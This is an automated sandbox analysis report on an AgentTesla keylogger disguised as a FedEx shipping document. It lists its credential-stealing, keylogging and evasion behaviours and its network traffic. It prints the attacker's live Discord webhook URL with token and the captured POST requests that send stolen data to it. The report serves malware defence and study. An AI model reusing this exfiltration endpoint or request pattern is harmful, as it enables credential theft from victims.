Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FeDex_shipping_document.exe

Overview

General Information

Sample Name:FeDex_shipping_document.exe
Analysis ID:830454
MD5:5cf87a160007a5e6c7a4d24e1d831327
SHA1:e11d7467bc961d5ff16c3541200be1ad5083cefa
SHA256:91e74ee16f6229b18ef4f973494b8ec68bad3420e90fd3f1ee6d835048421fcf
Tags:AgentTeslaexeFedEx
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • FeDex_shipping_document.exe (PID: 5300 cmdline: C:\Users\user\Desktop\FeDex_shipping_document.exe MD5: 5CF87A160007A5E6C7A4D24E1D831327)
    • FeDex_shipping_document.exe (PID: 3628 cmdline: C:\Users\user\Desktop\FeDex_shipping_document.exe MD5: 5CF87A160007A5E6C7A4D24E1D831327)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    Process Memory Space: FeDex_shipping_document.exe PID: 3628JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      Process Memory Space: FeDex_shipping_document.exe PID: 3628JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.2.7162.159.138.232497014432851779 03/20/23-11:52:05.074477
        SID:2851779
        Source Port:49701
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: FeDex_shipping_document.exeReversingLabs: Detection: 38%
        Source: FeDex_shipping_document.exeVirustotal: Detection: 34%Perma Link
        Machine Learning detection for sample
        Source: FeDex_shipping_document.exeJoe Sandbox ML: detected
        Source: 0.2.FeDex_shipping_document.exe.4549c80.9.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj"}
        Source: FeDex_shipping_document.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.7:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49701 version: TLS 1.2
        Source: FeDex_shipping_document.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: nlsY.pdb source: FeDex_shipping_document.exe
        Source: Binary string: nlsY.pdbSHA256 source: FeDex_shipping_document.exe

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49701 -> 162.159.138.232:443
        May check the online IP address of the machine
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeDNS query: name: api.ipify.org
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1Content-Type: multipart/form-data; boundary=----------f62e205f82fd40c8a956e69d1bcde1edUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1217Expect: 100-continueConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1Content-Type: multipart/form-data; boundary=----------8b7e5ceedd2047309d0db2508590a0cdUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 2002Expect: 100-continue
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1085960984071524425/1087327699887980574/user-128757_2023
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1085960984071524425/1087327704275234847/user-128757_2023
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DL
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com4
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.comD8
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1085960984071524425/1087327699887980574/user-128757_20
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1085960984071524425/1087327704275234847/user-128757_20
        Source: unknownHTTP traffic detected: POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1Content-Type: multipart/form-data; boundary=----------f62e205f82fd40c8a956e69d1bcde1edUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1217Expect: 100-continueConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.7:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49701 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Installs a global keyboard hook
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\FeDex_shipping_document.exe
        Contains functionality to register a low level keyboard hook
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06AA1ED8 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06AA25F0,00000000,00000000
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWindow created: window name: CLIPBRDWNDCLASS

        System Summary

        barindex
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 0_2_0184C844
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 0_2_0184F1E8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 0_2_0184F1F8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06AA0B80
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06AAF0D8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06AAA660
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C9C560
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C91CA4
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C98978
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C92B80
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C92B70
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C9CB21
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C93950
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E3DD30
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E326C0
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E3168A
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E3AEA8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E33FE0
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E31DF7
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E388F8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E37920
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_070D136B
        Source: FeDex_shipping_document.exe, 00000000.00000000.247629334.0000000000F28000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenlsY.exe> vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.268564133.000000000451B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.273598775.0000000007AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.268564133.00000000041B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.0000000003287000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.00000000031F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.00000000031F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000001.00000002.515103370.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000001.00000002.515787794.0000000000F38000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exeBinary or memory string: OriginalFilenamenlsY.exe> vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: FeDex_shipping_document.exeReversingLabs: Detection: 38%
        Source: FeDex_shipping_document.exeVirustotal: Detection: 34%
        Source: FeDex_shipping_document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FeDex_shipping_document.exe.logJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@4/3
        Source: FeDex_shipping_document.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: FeDex_shipping_document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: FeDex_shipping_document.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: FeDex_shipping_document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: nlsY.pdb source: FeDex_shipping_document.exe
        Source: Binary string: nlsY.pdbSHA256 source: FeDex_shipping_document.exe
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 0_2_0184CB36 pushfd ; ret
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06AAD532 push es; ret
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_070D1360 pushfd ; retf
        Source: initial sampleStatic PE information: section name: .text entropy: 7.872797130775443
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
